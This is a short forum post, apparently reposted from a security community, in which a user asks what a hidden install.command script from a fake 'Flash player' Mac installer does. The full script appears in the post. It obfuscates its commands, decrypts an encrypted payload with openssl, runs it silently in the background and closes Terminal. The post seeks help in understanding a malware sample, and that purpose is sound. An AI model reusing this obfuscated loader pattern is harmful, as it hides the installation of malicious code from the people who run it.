Hello, I'm not sure if this is Python or what, I barely know HTML, but a friend of mine just installed a questionable version of "Flash player". I had him send me the .dmg file (he's on Mac) and I found a hidden file called install.command. I looked at it in a text editor and found this script. I'm wondering what this has exposed him to?
!/bin/bash G="a";F="c";Q="d";H="e";V="l";Z="m";X="n";T="o";J="p";K="s"; export appDir=$(cd "$(dirname "$0")"; pwd -P) export tmpDir="$(mktemp -d /tmp/XXXXXXXXXXXX)" export binFile="$(cd "$appDir"; ls | grep -Ev '.(command)$' | head -n 1 | rev)" export archive="$(echo $binFile | rev)" export commandArgs='U2FsdGVkX18Jg2bLpCORE+dITJZ6Y2yq7MEc7+ajwwGf4jRErpiJtl4hEsUp+PBTpaDzvVODS2+C9SefrU2RzPOaUkkDev4MhArvaO6SPyJLYOfdR6MI4DA2ACNLALcDJN9PNEeTmiV4J9Auu5NhqA5dhzKBgzxqNrbUXzAWDU3B/rH+ih0HAPX+cKGO1t5BKIpJksGoZBpuw0rNkeHBb1ic1zjq5W0BmgUqVHtr2qyYvUC8Y7LAALS6UOPYcQVl4j4UKceZfmi/xBDc5VppqE6KqDCIfy0q3r/15AVWWqvOgclZmT547mkHry2KzpBv' decryptedFommand="$(echo -e "$commandArgs" | ${T}${J}${H}${X}${K}${K}${V} ${H}${X}${F} -${G}${H}${K}-256-cbc -${Q} -A -b${G}${K}${H}64 -${J}${G}${K}${K} "${J}${G}${K}${K}:$archive")" nohup /bin/bash -c "eval "$decryptedFommand"" >/dev/null 2>&1 & killall Terminal
[link] [comments]
from hacking: security in practice https://ift.tt/3m96Gea
Comments
Post a Comment